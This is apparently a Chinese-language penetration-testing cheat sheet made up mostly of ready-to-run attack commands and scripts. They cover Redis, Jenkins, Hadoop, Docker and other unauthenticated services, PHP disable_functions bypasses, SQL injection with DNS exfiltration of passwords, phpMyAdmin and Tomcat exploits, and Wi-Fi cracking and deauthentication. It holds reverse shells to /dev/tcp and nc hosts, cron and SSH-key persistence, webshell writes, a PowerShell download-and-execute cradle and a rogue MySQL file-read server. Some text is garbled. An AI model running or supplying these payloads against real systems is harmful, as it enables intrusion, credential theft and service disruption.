保存為shecho -e "\n\n*/1 * * * * /bin/bash -i >& /dev/tcp/192.168.0.108/12138 0>&1\n\n"|redis-cli -h $1 -p $2 -x set 1echo -e "\n\n */1 * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.108",12138));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'\n\n"|redis-cli -h $1 -p $2 -x set 1redis-cli -h $1 -p $2 config set dir /var/spool/cron/redis-cli -h $1 -p $2 config set dbfilename rootredis-cli -h $1 -p $2 saveredis-cli -h $1 -p $2 quit執行>bash 1.sh 192.168.0.120 6379
寫shell
6379> config set dir /var/www/html/6379> config set dbfilename shell.php6379> set x "<?php phpinfo();?>"6379> save
SSH
ssh-keygen本地生成一對密鑰https://github.com/JoyChou93/hackredis>ssh-keygen -t rsa -C "xx@xx.com">(echo -e "\n\n"; cat /root/.ssh/id_rsa.pub; echo -e "\n\n") > qq.txt>redis-cli -h 127.0.0.1 flunshall>cat qq.txt | redis-cli -h 127.0.0.1 -x set crackit>redis-cli -h 127.0.0.16379> config set dir /root/.ssh/6379> config set dbfilename "authorized_keys"6379> save本地登錄#ssh -i id_rsa root@11.11.11.11
redis-rogue-getshell
https://github.com/vulhub/redis-rogue-getshell需要python3.0以上編譯>cd RedisModulesSDK/>make會在此目錄下生成exp.so執行命令>python3 redis-master.py -r 192.168.0.120 -p 6379 -L 192.168.0.108 -P 12138 -f RedisModulesSDK/exp.so -c "cat /etc/passwd"
redis-rogue-server
https://github.com/n0b0dyCN/redis-rogue-server需要python3.6以上編譯>cd RedisModulesSDK/exp>make執行>./redis-rogue-server.py --rhost 192.168.0.120 --lhost 192.168.0.108
也可以反向shell
redis在windows下的利用
Web目錄寫入木馬啟動項系統DLL劫持(目標重啟或注銷)特定軟件的DLL劫持覆蓋快捷方式覆蓋配置文件覆蓋sethc等文件https://github.com/r35tart/RedisWriteFile>python3 rediswritefile.py --rhost=目標IP --rport=6379 --lhost=本機IP --lport=本地端口 --rpath="在目標保存的路徑" --rfile="在目標保存的文件" --lfile="本地文件" --auth=redis密碼
Lua RCE
https://github.com/QAX-A-Team/redis_lua_exploit修改redis_lua.py里的 host 為目標 IP執行返回正常,反彈shell>eval "tonumber('/bin/bash -i >& /dev/tcp/192.168.0.108/12345 0>&1', 8)" 0
Jenkins未授權訪問
http://www.qq.com:8080/managehttp://www.qq.com:8080/script執行命令>println "ifconfig -a".execute().text反彈shell>println "wget http://your.com/back.py -P /tmp/".execute().text>println "python /tmp/back.py yourIP 8080".execute().text寫shell>println "wget http://your.com/t.txt -o /var/www/html/1.php".execute().text>new File("/var/www/html/1.php").write('<?php @eval($_POST[1]);?>');>def webshell = '<?php @eval($_POST[1]);?>'>new File("/var/www/html/1.php").write("$webshell");
MongoDB未授權訪問
默認端口27017直接連接進行增刪改查連接工具https://s3.mongobooster.com/download/releasesv5/nosqlbooster4mongo-5.1.12.exe
ZooKeeper未授權訪問
默認端口2181獲得服務器環境信息>echo envi|nc 192.168.0.1 2181連接>./zkCli.sh -server ip:port連接工具https://issues.apache.org/jira/secure/attachment/12436620/ZooInspector.zip
Elasticsearch未授權訪問
默認端口9200http://1.1.1.1:9200/_plugin/head/http://1.1.1.1:9200/_nodeshttp://1.1.1.1:9200/_riverhttp://1.1.1.1:9200/_plugin/sql/
Memcache未授權訪問
默認端口11211>telnet 1.1.1.1 11211>nc -vv 1.1.1.1 11211
Hadoop未授權訪問
http://192.168.1.1:8088/cluster本地監聽端口 >> 創建Application >> 調用Submit Application API提交
#!/usr/bin/env pythonimport requests target = 'http://192.168.18.129:8088/'lhost = '192.168.18.138' # put your local host ip here, and listen at port 9999 url = target + 'ws/v1/cluster/apps/new-application'resp = requests.post(url)app_id = resp.json()['application-id']url = target + 'ws/v1/cluster/apps'data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, }, }, 'application-type': 'YARN',}requests.post(url, json=data)
Docker未授權訪問
默認端口2375>docker -H tcp://1.1.1.1:2375 images本地監聽啟動容器docker -H tcp://1.1.1.1:2375 run -id -v /etc/crontabs:/tmp alpine:latestdocker -H tcp://1.1.1.1:2375 ps進入容器docker -H tcp://1.1.1.1:2375 exec -it a8ff7ed880fb shecho '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加計劃任務cat /tmp/rootexitShipyard默認密碼admin/shipyard
ActiveMQ未授權訪問
默認端口8161http://1.1.1.1:8161/admin/connections.jspPUT /fileserver/%2F%2F2%083.jsp HTTP/1.0Content-Length: 27Host: 1.1.1.1:8161Connection: CloseAuthorization: Basic YWRtaW46YWRtaW4=123123123123123123123123123
JBOSS未授權訪問
http://192.168.1.1:8080/jmx-console/ 無需認證進入jboss.deployment部署shelladdURL()的paramValue寫入遠程war木馬地址
阿里云OSS Key利用
反編譯app文件,查找可能會包含oss key的文件,如JS����。OSSAccessKey���、AccessKeySecret使用OSS瀏覽器訪問����。第三方行云管家可修改系統密碼���。反彈shellFrom: https://xz.aliyun.com/t/8310https://api.aliyun.com/#/?product=Ecs搜索框搜索選擇CreateCommand來創建一個命令CommandContent填命令的base64,Type填RunShellScript命令echo "bash -i >& /dev/tcp/你的IP/端口 0>&1"| base64bash -i >& /dev/tcp/你的IP/端口 0>&1YmFzaCAtaSAmZ3Q7JiAvZGV2L3RjcC8xLjEuMS4xLzQ0NDQgMCZndDsmMQ==
填好以后點調試SDK會直接給你起一個Cloud shell
并創建一個CreateCommand.py文件,使用vi編輯
填accessKeyId,accessSecret保存執行,并記錄Commandid
再次在搜索框搜索InvokeCommand
Commandid填上面請求的返回值,InstanceId填行云管家顯示的實例ID
填好了點調試sdk然后編輯文件把accessKeyId accessSecret填一下,執行
然后看監聽的服務器shell已經反彈成功
Linux繞過disable_function
LD_PRELOAD
linux環境putenv()�����、mail()可用https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOADhttp://192.168.0.107/bypass_disablefunc.php?cmd=pwd&outpath=/tmp/xx&sopath=/var/www/bypass_disablefunc_x64.sooutpath是命令輸出位置,sopath指定so文件路徑��?�;蛱鎿Qphp文件中的mail為error_log("a",1);
php7.0-7.3 bypass
直接bypasshttps://raw.githubusercontent.com/mm0r1/exploits/master/php7-gc-bypass/exploit.php
windows系統組件com繞過
<?php$command = $_GET['cmd'];$wsh = new COM('WScript.shell'); // 生成一個COM對象 Shell.Application也能$exec = $wsh->exec("cmd /c".$command); //調用對象方法來執行命令$stdout = $exec->StdOut();$stroutput = $stdout->ReadAll();echo $stroutput;?>
CGI啟動方式
phpinfo中搜索server api是cgi或者fastcgi如果是cgi模式:上傳如下htaccessOptions ExecCGIAddHandler cgi-script .xxwindows平臺#!C:/Windows/System32/cmd.exe /c start calc.exe1linux平臺#!/bin/bashecho -ne "Content-Type: text:html\n\n"whoami如果是fast_cgi,上傳如下htaccessOptions +ExecCGIAddHandler fcgid-script .abcFcgidWrapper "C:/Windows/System32/cmd.exe /c start cmd.exe" .abc上傳任意文件.abc相對路徑AddHandler fcgid-script .htmlFcgidWrapper "../../php/php7.3.4nts/php-cgi.exe" .htmlAddHandler fcgid-script .xxFcgidWrapper "../../../WWW/localhost/calc.exe" .xx
ImageMagick組件繞過
imageMagick 版本 v6.9.3-9 或 v7.0.1-0第一種
<?phpecho "Disable Functions: " . ini_get('disable_functions') . "\n";$command = PHP_SAPI == 'cli' ? $argv[1] : $_GET['cmd'];if ($command == '') {$command = 'id';}$exploit = <<<EOFpush graphic-contextviewbox 0 0 640 480fill 'url(https://example.com/image.jpg"|$command")' //核心pop graphic-contextEOF;file_put_contents("KKKK.mvg", $exploit);$thumb = new Imagick();$thumb->readImage('KKKK.mvg');$thumb->writeImage('KKKK.png');$thumb->clear();$thumb->destroy();unlink("KKKK.mvg");unlink("KKKK.png");?>
第二種
#include <stdlib.h>#include <string.h>void payload() {const char* cmd = "nc -e /usr/bin/zsh 127.0.0.1 4444";system(cmd);}int fileno() {if (getenv("LD_PRELOAD") == NULL) { return 0; }unsetenv("LD_PRELOAD");payload();}
編譯gcc -shared -fPIC imag.c -o imag.so
<?phpputenv('LD_PRELOAD=/var/www/html/imag.so');$img = new Imagick('/tmp/1.ps');?>
常規函數繞過
<?phpecho exec('whoami');?>------------------------------------------------------<?phpecho shell_exec('whoami');?>------------------------------------------------------<?phpsystem('whoami');?>------------------------------------------------------<?phppassthru("whoami");?>------------------------------------------------------<?php$command=$_POST['cmd'];$handle = popen($command , "r");while(!feof($handle)){ echo fread($handle, 1024); //fread($handle, 1024);}pclose($handle);?>-------------------------------------------------------<?php$command="ipconfig";$descriptorspec = array(1 => array("pipe", "w"));$handle = proc_open($command ,$descriptorspec , $pipes);while(!feof($pipes[1])){ echo fread($pipes[1], 1024); //fgets($pipes[1],1024);}?>
pcntl_exec
開啟了pcntl 擴展,并且php 4>=4.2.0 , php5,linux
<?phpif(function_exists('pcntl_exec')) {pcntl_exec("/bin/bash", array("/tmp/test.sh"));} else {echo 'pcntl extension is not support!';}?>
test.sh#!/bin/bashnc -e /bin/bash 1.1.1.1 8888 #反彈shell
imap_open函數
<?phperror_reporting(0);if (!function_exists('imap_open')) {die("no imap_open function!");}$server = "x -oProxyCommand=echo\t" . base64_encode($_GET['cmd'] . ">/tmp/cmd_result") . "|base64\t-d|sh}";imap_open('{' . $server . ':143/imap}INBOX', '', '');sleep(5);echo file_get_contents("/tmp/cmd_result");?>
php7.4 FFI繞過
php 7.4ffi.enable=true
<?php$a='nc -e /bin/bash ip 8888';$ffi = FFI::cdef( "int system(char *command);", "libc.so.6");$ffi->system($a);?>
shellshock
存在CVE-2014-6271漏洞PHP 5.*,linux,putenv()�、mail()可用
<?phpfunction shellshock($cmd) {$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("a@127.0.0.1","","","","-bv");$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") return $output;else return "No output, or not vuln.";}echo shellshock($_REQUEST["cmd"]);?>
蟻劍插件
01利用LD_PRELOAD環境變量02利用ShellShock(CVE-2014-6271)03利用Apache Mod CGI04 PHP-FPM利用LD_PRELOAD環境變量(同1)05攻擊PHP-FPM監聽端口06 Json Serializer UAF07具有特定析構函數UAF的PHP7 GC
open_basedir繞過
第一種http://x.com/shell.php?a=$a=new DirectoryIterator("glob:///*");foreach($a as $f){echo($f->__toString().' ');};http://x.com/shell.php?a=if%20(%20$b%20=%20opendir(%22glob:///var/www/html/*.php%22)%20)%20{while%20(%20($file%20=%20readdir($b))%20!==%20false%20)%20{echo%20%22filename:%22.$file.%22\n%22;}closedir($b);}第二種http://x.com/shell.php?a=ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');system('cat ../../../../../etc/passwd');http://x.com/shell.php?a=mkdir(%22/tmp/crispr%22);chdir(%27/tmp/crispr/%27);ini_set(%27open_basedir%27,%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);chdir(%27..%27);ini_set(%27open_basedir%27,%27/%27);print_r(scandir(%27.%27))第三種命令執行繞過讀文件?a=show_source('preload.php');?a=echo(readfile('preload.php'));?a=print_r(readfile('preload.php'));?a=echo(file_get_contents('preload.php'));?a=print_r(file_get_contents('preload.php'));
Tomcat Ajp LFI&RCE
LFIhttps://github.com/Kit4y/CNVD-2020-10487-Tomcat-Ajp-lfi-Scanner>python CNVD-2020-10487-Tomcat-Ajp-lfi.py 192.168.0.110 -p 8009 -f pass
RCE>msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.0.107 LPORT=12138 R >/var/www/html/1.jpg配合目標文件上傳傳入服務器
>java -jar ajpfuzzer_v0.6.jar>connect 192.168.0.110 8009>forwardrequest 2 "HTTP/1.1" "/index.jsp" 192.168.0.107 192.168.0.107 porto 8009 false "Cookie:AAAA=BBBB","Accept-Encoding:identity" "javax.servlet.include.request_uri:index.jsp","javax.servlet.include.path_info:/1.jpg","javax.servlet.include.servlet_path:/"
Mysql連接文件讀取
https://github.com/Gifts/Rogue-MySql-Server客戶端必須啟用LOCAL-INFILE客戶端支持非SSL連接目標web存在adminer等可檢查數據庫連接的腳本�����。攻擊機本地運行python構造假mysql服務,使用目標web連接,讀取文件�����。#coding=utf-8import socketimport logginglogging.basicConfig(level=logging.DEBUG)filename="/etc/passwd"sv=socket.socket()sv.bind(("",3305))sv.listen(5)conn,address=sv.accept()logging.info('Conn from: %r', address)conn.sendall("\x4a\x00\x00\x00\x0a\x35\x2e\x35\x2e\x35\x33\x00\x17\x00\x00\x00\x6e\x7a\x3b\x54\x76\x73\x61\x6a\x00\xff\xf7\x21\x02\x00\x0f\x80\x15\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x70\x76\x21\x3d\x50\x5c\x5a\x32\x2a\x7a\x49\x3f\x00\x6d\x79\x73\x71\x6c\x5f\x6e\x61\x74\x69\x76\x65\x5f\x70\x61\x73\x73\x77\x6f\x72\x64\x00")conn.recv(9999)logging.info("auth okay")conn.sendall("\x07\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00")conn.recv(9999)logging.info("want file...")wantfile=chr(len(filename)+1)+"\x00\x00\x01\xFB"+filenameconn.sendall(wantfile)content=conn.recv(9999)logging.info(content)conn.close()
Mysql開啟外連
>grant all privileges on user.* to user@"%" identified by "P@ssw0rd";
MSSQL&Agent Job上線
USE msdb; exec dbo.sp_add_job @job_name = N'syspolicy_purge_now' ; exec sp_add_jobstep @job_name = N'syspolicy_purge_now', @step_name = N'syspolicy_purge_step1', @subsystem = N'PowerShell', @command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring(''http://IP_OR_HOSTNAME/file''))"', @retry_attempts = 1, @retry_interval = 5 ;exec dbo.sp_add_jobserver @job_name = N'syspolicy_purge_now '; exec dbo.sp_start_job N'syspolicy_purge_now ';使用在注入點處,使用burp進行url編碼,編碼后前面加%20(空格URL編碼)
注入無列名
http://url/index.php?id=1 order by 6http://url/index.php?id=-1unionselect 1,(select `4` from (select 1,2,3,4,5,6unionselect * from users)a limit 1,1)-- -http://url/index.php?id=-1unionselect 1,(select concat(`3`,0x3a,`4`) from (select 1,2,3,4,5,6unionselect * from users)a limit 1,1)-- -
DNSLog
http://ceye.iohttp://www.dnslog.cn/
注入
MYSQL
顯示數據庫?id=1' and if((select load_file(concat('\\\\',(select database()),'.jhsefs.ceye.io\\sql_test'))),1,0)--+顯示數據庫?id=1' and if((select load_file(concat('\\\\',(select schema_name from information_schema.schemata limit {0},1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+顯示表?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema='dbname' limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+?id=1' and if((select load_file(concat('\\\\',(select table_name from information_schema.tables where table_schema=0x1x1x2x limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+顯示字段?id=1' and if((select load_file(concat('\\\\',(select column_name from information_schema.columns where table_name='users' limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+顯示數據?id=1' and if((select load_file(concat('\\\\',(select hex(user) from users limit 0,1),'.jhsefs.ceye.io\\sql_test'))),1,0)--+
MSSQL
查數據?id=1;declare @host varchar(1024);select @host=(select master.dbo.fn_varbintohexstr(convert(varbinary,rtrim(pass))) FROM test.dbo.test_user where [USER] = 'admin')%2b'.cece.nk40ci.ceye.io';exec('master..xp_dirtree "\'%2b@host%2b'\foobar$"');Sa密碼?id=1DECLARE @host varchar(1024);select @host=(select TOP 1 master.dbo.fn_varbintohexstr(password_hash)FROM sys.sql_loginsWHERE name='sa')+'.ip.port.b182oj.ceye.io';exec('master..xp_dirtree"\'+@host+'\foobar$"');執行命令exec master..xp_cmdshell "whoami>D:/temp%26%26certutil -encode D:/temp D:/temp2%26%26findstr /L /V ""CERTIFICATE"" D:/temp2>D:/temp3";exec master..xp_cmdshell "cmd /v /c""set /p MYVAR=< D:/temp3 %26%26 set FINAL=!MYVAR!.xxx.ceye.io %26%26 ping !FINAL!""";exec master..xp_cmdshell "del ""D:/temp"" ""D:/temp2"" ""D:/temp3""";
postgreSQL
?id=1;drop TABLE IF EXISTS table_output;CREATE TABLE table_output(content text);CREATE OR replace FUNCTION temp_function() RETURNS VOID AS $$ declare exec_cmd TEXT;declare query_result TEXT;BEGIN select INTO query_result (select encode(pass::bytea,'hex') from test_user where id =1);exec_cmd := E'COPY table_output(content) FROM E\'\\\\\\\\'||query_result||E'.pSQL.3.nk40ci.ceye.io\\\\foobar.txt\'';EXECUTE exec_cmd;END;$$ LANGUAGE plpgSQL SECURITY DEFINER;select temp_function();
Oracle
?id=1unionselect UTL_HTTP.REQUEST((select pass from test_user where id=1)||'.nk40ci.ceye.io') FROM sys.DUAL;?id=1unionselect DBMS_LDAP.INIT((select pass from test_user where id=1)||'.nk40ci.ceye.io',80) FROM sys.DUAL;?id=1unionselect HTTPURITYPE((select pass from test_user where id=1)||'.xx.nk40ci.ceye.io').GETCLOB() FROM sys.DUAL;?id=1unionselect UTL_INADDR.GET_HOST_ADDRESS((select pass from test_user where id=1)||'.ddd.nk40ci.ceye.io') FROM sys.DUAL;
命令執行
>curl http://0ox095.ceye.io/`whoami`>ping `whoami`.b182oj.ceye.io>ping %CD%.lfofz7.dnslog.cn&cmd /v /c "whoami > temp && certutil -encode temp temp2 && findstr /L /V "CERTIFICATE" temp2 > temp3 && set /p MYVAR=< temp3 && set FINAL=!MYVAR!.xxx.ceye.io && nslookup !FINAL!"
XXE
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://b182oj.ceye.io/xxe_test">%remote;]><root/>
Struts
xx.action?redirect:http://b182oj.ceye.io/%25{3*4}xx.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'whoami'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23t%3d%23d.readLine(),%23u%3d"http://b182oj.ceye.io/result%3d".concat(%23t),%23http%3dnew%20java.net.URL(%23u).openConnection(),%23http.setRequestMethod("GET"),%23http.connect(),%23http.getInputStream()}
weblogic
/uddiexplorer/SearchPublicRegistries.jsp?operator=http://b182oj.ceye.io/test&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Businesslocation&btnSubmit=Search
Resin
xxoo.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=http://b182oj.ceye.io/ssrf
Discuz
/forum.php?mod=ajax&action=downremoteimg&message=[img=1,1]http://b182oj.ceye.io/xx.jpg[/img]&formhash=xxoo
PHPMyadmin
LOG
show variables like '%general%'; #查看配置set global general_log = on; #開啟general log模式set global general_log_file = '/var/www/html/1.php';select '<?php eval($_POST[cmd]);?>'
慢查詢
show variables like '%slow%';set GLOBAL slow_query_log_file='C:/WWW/slow.php';set GLOBAL slow_query_log=on;set GLOBAL log_queries_not_using_indexes=on;select '<?php phpinfo();?>' from mysql.db where sleep(10);
任意文件讀取
phpMyAdmin 2.xPOST /scripts/setup.php HTTP/1.1Host: ip:8080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 80action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
LFI
phpMyAdmin 4.0.1--4.2.12,PHP < 5.3.4/gis_data_editor.php?token=2941949d3768c57b4342d94ace606e91&gis_data[gis_type]=/../../../../phpinfo.txt%00phpMyAdmin 4.8.0和4.8.1 后臺權限>select '<?php phpinfo();exit;?>'/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_***
RCE
PhpMyAdmin 4.0.x-4.6.2,PHP 4.3.0-5.4.6后臺權限>cve-2016-5734.py -u root --pwd="" http://localhost/pma -c "system('ls -lua');"phpMyAdmin 4.8.0~4.8.3CREATE DATABASE foo;CREATE TABLE foo.bar (baz VARCHAR(100) PRIMARY KEY );insert INTO foo.bar select '<?php phpinfo(); ?>';訪問http://10.1.1.10/chk_rel.php?fixall_pmadb=1&db=fooINSERT INTO pma__column_infoSELECT '1', 'foo', 'bar', 'baz', 'plop','plop', 'plop', 'plop','../../../../../../../../tmp/sess_***','plop';訪問/tbl_replace.php?db=foo&table=bar&where_clause=1=1&fields_name[multi_edit][][]=baz&clause_is_unique=1
PHP-FPM RCE
>git clone https://github.com/neex/phuip-fpizdam.git>cd phuip-fpizdam>go get -v && go build>go run . http://127.0.0.1/index.phphttp://127.0.0.1/index.php?a=id多執行幾次
phpstudy后門
php:5.2.17 5.4.45GET / HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding:gzip,deflateAccept-Charset:c3lzdGVtKCJuZXQgdXNlciIpOw==Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Connection: closeUpgrade-Insecure-Requests: 1Cache-Control: max-age=0Content-Length: 2
cmdhijack
From: https://hackingiscool.pl/poc完整的命令行cmd.exe /c "ping 127.0.0.1/../../../../../../../../../../windows/system32/calc.exe"可能產生的影響包括拒絕服務,信息泄露,任意代碼執行(取決于目標應用程序和系統)���。以web應用為例
由于使用了escapeshellcmd(),不易受命令注入的影響,使用本方法一個poc
不限于任何位置,文件
再擴展一下如,powershell帶-enc執行,或mshta等方法,可參考https://lolbas-project.github.io/,但是依照windows的特性,在無法將完整字符串解析為有效路徑的情況下,會拆分空格后面的內容,這里可以使用&符號如:>cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&powershell -enc xxxx">cmd.exe /c "cmd /c /../../../../../../../../../../windows/system32/calc&mshta http://192.168.0.105:8080/xsuUEWJ.hta"
Database
MSSQL
判斷數據庫;and (select count(*) from sysobjects)>0 mssql;and (select count(*) from msysobjects)>0 access查庫?id=1 and (select top 1 Name FROM Master..SysDatabases)>0 --?id=1 and (select top 1 Name FROM Master..SysDatabases where name not in ('master'))>0 --查表import requestsimport retable_list = ['']def get_sqlserver_table(table_list, table_num): for num in range(0,table_num): # print("','".join(table_list)) sql_str = "and (select top 1 name from [xxxx].sys.all_objects where type='U' AND is_ms_shipped=0 and name not in ('{}'))>0".format("','".join(table_list)) url = "http://www.xxxxx.cn/x.aspx?cid=1' {} AND 'aNmV'='aNmV".format(sql_str) r = requests.get(url, headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.87 Safari/537.36'}) res = re.search(r'\'(.*)\'', r.content.decode('utf-8'), re.M|re.I) table_name = str(res.group(1)) table_list.append(table_name) print("[{}] - TableName: {}".format(str(r.status_code), table_name))if __name__ == "__main__": get_sqlserver_table(table_list, 16)判斷是否存在xp_cmdshelland 1=(select count(*) from master.dbo.sysobjects where xtype = 'x' and name = 'xp_cmdshell')執行命令;exec master..xp_cmdshell "net user name password /add"—查看權限and (select IS_SRVROLEMEMBER('sysadmin'))=1-- //saand (select IS_MEMBER('db_owner'))=1-- // dboand (select IS_MEMBER('public'))=1-- //public站庫分離獲取服務器IP;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=xxx;Network=DBMSSOCN;Address=你的ip,80;', 'select * from dest_table') select * from src_table;--LOG備份;alter database testdb set RECOVERY FULL --;create table cmd (a image) --;backup log testdb to disk = 'c:\wwwroot\shell.asp' with init --;insert into cmd (a) values ('<%%25Execute(request("chopper"))%%25>')--;backup log testdb to disk = 'c:\wwwroot\shell.asp' –2000差異備份;backup database testdb to disk ='c:\wwwroot\bak.bak';--;create table [dbo].[testtable] ([cmd] [image]);--;insert into testtable (cmd) values(木馬hex編碼);--;backup database testdb to disk='c:\wwwroot\upload\shell.asp' WITH DIFFERENTIAL,FORMAT;--2005差異備份;alter/**/database/**/[testdb]/**/set/**/recovery/**/full—;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/database/**/[testdb]/**/to/**/disk=@d/**/with/**/init--;create/**/table/**/[itpro]([a]/**/image)—;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--;insert/**/into/**/[itpro]([a])/**/values(木馬hex編碼)—;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=木馬保存路徑的SQL_EN編碼/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--;drop/**/table/**/[itpro]—;declare/**/@d/**/nvarchar(4000)/**/select/**/@d=0x640062006200610063006B00/**/backup/**/log/**/[testdb]/**/to/**/disk=@d/**/with/**/init--
PostgreSQL
連接>psql -U dbuser -d exampledb -h 127.0.0.1 -p 5432查看版本>select version();列出數據庫>select datname from pg_database;列出所有表名>select * from pg_tables;讀取賬號秘密>select usename,passwd from pg_shadow;當前用戶>select user;修改密碼>alter user postgres with password '123456';列目錄>select pg_ls_dir('/etc');讀文件>select pg_read_file('postgresql.auto.conf',0,100); #行數&>drop table wooyun;>create table wooyun(t TEXT);>copy wooyun FROM '/etc/passwd';>select * from wooyun limit 1 offset 0;&>select lo_import('/etc/passwd',12345678);>select array_agg(b)::text::int from(select encode(data,'hex')b,pageno from pg_largeobject where loid=12345678 order by pageno)a;寫文件create table shell(shell text not null);insert into shell values($$<?php @eval($_POST[1]);?>$$);copy shell(shell) to '/var/www/html/shell.php';© (select '<?php phpinfo();?>') to '/var/www/html/shell.php';爆破MSF>use auxiliary/scanner/postgres/postgres_login執行命令版本8.2以下>create function system(cstring) returns int AS '/lib/libc.so.6', 'system' language C strict;>create function system(cstring) returns int AS '/lib64/libc.so.6', 'system' language C strict;>select system('id');
近源攻擊
WI-FI破解
wifite
Kali下工具wifite,加載網卡,開啟監聽模式,#airmon-ng check kill#airmon-ng start wlan1安裝hcxtools v4.2.0或更高版本,hcxdumptool v4.2.0或更高版本#apt-get install libcurl4-openssl-dev libssl-dev zlib1g-dev libpcap-dev#git clone https://github.com/ZerBea/hcxtools#cd hcxtools#make#make install#git clone https://github.com/ZerBea/hcxdumptool#cd hcxdumptool#make#make install#wifite –-dict /root/Desktop/wordlist.txt 加載
Aircrack-ng
#airmon-ng start wlan0 開啟監聽模式#airodump-ng wlan0mon 查看數據包#airodump-ng –c 1 –bssid APmac –w name wlan1mon保存某AP數據包#aireplay-ng –deauth 10 –a APmac wlan0mon deauth攻擊#aireplay-ng -0 2 -a C8:3A:35:30:3E:C8 -c B8:E8:56:09:CC:9C wlan0mon deauth攻擊某個設備直至獲取handshake(握手包)#airmon-ng stop wlan0mon 關閉監聽模式#aircrack-ng –w wordlist.txt name.cap 指定字典破解密碼
釣魚網絡
Hostapd
#apt install hostapd dnsmasq#cd /etc/hostapd#vim open.conf 創建無加密熱點Interface=wlan1Ssid=FreeWIFIDriver=nl80211Channel=1Hw_mode=g#vim /etc/dnsmasq.confDhcp-range=10.0.0.1, 10.0.0.255,12hInterface=wlan1#systemctl restart dnsmasq消除網卡限制#nmcli radio wifi off#rfkill unblock wlan#ifconfig wlan1 10.0.0.1/24#hostapd open.conf嗅探#sysctl –w net.ipv4.ip_forward=1#iptables –t nat –A POSTROUTING –o 網卡 –j MASQUERADE#bettercap –iface wlan1#net.show#net.sniff on#driftnet –i wlan1
Hostapd-wpe
#apt install hostapd-wpe#vim /etc/hostapd-wpe/hostapd-wpe.conf配置interface=wlan1Ssid=Channel=證書修改#cd /etc/hostapd-wpe/certs/文件ca.cnf server.cnf client.cnf修改countrName stateOrProvinceName localityName …….#rm –rf *.pem *.der *.csr *.crt *.key *.p12 serial* index.txt*#make clean#./bootstrap#make install執行創建熱點#hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf獲取到密碼時使用asleep破解#asleap –C Challenge值 –R response值 –W 字典文件
無線干擾
Beacon flood
需切換網卡為監聽模式#airmon-ng start wlan1創建大量虛假熱點Mdk3 mon0 b#mdk3?wlan1mon?b?-f /root/wifi.txt -a -s 1500
Deauth flood
針對AP#airmon-ng start wlan1#aireplay-ng –deauth 10 –a AP’s mac address mon0針對AP內設備#airmon-ng start wlan1 將網卡置為監聽模式#airodump-ng wlan1mon –bssid 目標ap的ssid#aireplay-ng -0 0 -a ap的ssid -c AP的ssid wlan0mon 開始攻擊
Mdk3 destruction
針對范圍內#mdk3 wlan1mon d針對AP#airodump-ng wlan1mon#mdk3 wlan1mon a -a APmac 發起攻擊黑名單#mdk3 wlan1mon d –c 信道 –b /blacklist.txt.#mdk3 wlan1mon b -n test -w -g -c 1 -s 200
WiFi芯片esp8266
Mdk4
#mdk4 wlan0mon d
CVE-2018-4407
Scapysend(IP(dst="192.168.1.132",options=[IPOption("A"*8)])/TCP(dport=2323,options=[(19, "1"*18),(19, "2"*18)]))Apple iOS 11及更早版本:所有設備(升級到iOS 12的部分設備)Apple macOS High Sierra(受影響的最高版本為10.13.6):所有設備(通過安全更新2018-001修復)Apple macOS Sierra(受影響的最高版本為10.12.6):所有設備(通過安全更新2018-005中修復)Apple OS X El Capitan及更早版本:所有設備
繞過mac地址認證
Ifconfig
#ifconfig wlan1 down#ifconfig wlan1 hw ether xx:xx:xx:xx:xx:xx#ifconfig wlan1 up
Macchanger
